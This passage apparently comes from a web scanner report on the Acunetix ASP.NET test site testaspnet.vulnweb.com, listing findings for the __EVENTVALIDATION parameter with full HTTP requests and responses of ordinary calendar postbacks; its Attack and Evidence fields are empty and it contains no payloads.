Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8323&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgCAATRArtoIZGRknSc84mEScHlDiNbfgg26UqYjVd4%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLjpdGNBwLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gLRr9I8yW1cSiQ7Ft7W0vUw6%2Fg72w%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:35:05 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgCAATRArtoIZGRknSc84mEScHlDiNbfgg26UqYjVd4=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjpdGNBwLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gLRr9I8yW1cSiQ7Ft7W0vUw6/g72w==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:White" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,097 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8405&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAA4cmv7toIZGRkjrZyUECQ0TL730sjilQC7IoCYSY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLjy4qZDgL%2BkLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no%2FQwC19no%2FQwC19mckAQC19mckAQC19nw%2BQIC19nw%2BQIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe%2Fw8CqOCe%2Fw8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9%2FziBQKN9%2FziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWkGOgRqCD8jCtjMGz%2FNZWd4iRdzw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:12 GMT Content-Length: 12592
Response Body - size: 12,592 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOiCL69oIHgJTRBYBBgAA4cmv7toIZGRkjrZyUECQ0TL730sjilQC7IoCYSY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjy4qZDgL+kLjwCwLRp67yDgKQuo2fAQKQuo2fAQKQuqGyCgKQuqGyCgKQutXWAwKQutXWAwKQusntDAKQusntDAKQur3VCQKQur3VCQKQutHpAgKQutHpAgLX2ZCeBwLX2ZCeBwLX2YQ1AtfZhDUC19m4yAkC19m4yAkC19ms7wIC19ms7wIC19nAgwoC19nAgwoC19n0pgMC19n0pgMC19no/QwC19no/QwC19mckAQC19mckAQC19nw+QIC19nw+QIC19nknAoC19nknAoCqOD2hQ0CqOD2hQ0CqODq2AYCqODq2AYCqOCe/w8CqOCe/w8CqOCykgcCqOCykgcCqOCmKQKo4KYpAqjg2s0JAqjg2s0JAqjgzuACAqjgzuACAqjg4ocKAqjg4ocKAqjg1uwIAqjg1uwIAqjgygMCqODKAwKN99SoAwKN99SoAwKN98jPDAKN98jPDAKN9/ziBQKN9/ziBQKN95C5DQKN95C5DQKN94TcBgKN94TcBgKN97jzDwKN97jzDwKN96yWBwKN96yWBwKN98AqAo33wCoCjfe0kg0Cjfe0kg0CjfeoqQYCjfeoqQYC5p273gkC5p273gkC5p2v9QIC5p2v9QIC5p3DiQoC5p3DiQoC5p33rAMC5p33rAMC5p3rwwwC5p3rwwwC5p2f5gUC5p2f5gWkGOgRqCD8jCtjMGz/NZWd4iRdzw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">January 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8432')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:White" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8408')" style="color:Black" title="January 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8409')" style="color:Black" title="January 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8410')" style="color:Black" title="January 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8411')" style="color:Black" title="January 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8412')" style="color:Black" title="January 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8413')" style="color:Black" title="January 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8414')" style="color:Black" title="January 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8415')" style="color:Black" title="January 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8416')" style="color:Black" title="January 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8417')" style="color:Black" title="January 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8418')" style="color:Black" title="January 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8419')" style="color:Black" title="January 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8420')" style="color:Black" title="January 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8421')" style="color:Black" title="January 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8422')" style="color:Black" title="January 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8423')" style="color:Black" title="January 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8424')" style="color:Black" title="January 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8425')" style="color:Black" title="January 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8426')" style="color:Black" title="January 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8427')" style="color:Black" title="January 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8428')" style="color:Black" title="January 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8429')" style="color:Black" title="January 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8430')" style="color:Black" title="January 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8431')" style="color:Black" title="January 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8432')" style="color:Black" title="February 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8433')" style="color:Black" title="February 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8434')" style="color:Black" title="February 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8435')" style="color:Black" title="February 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
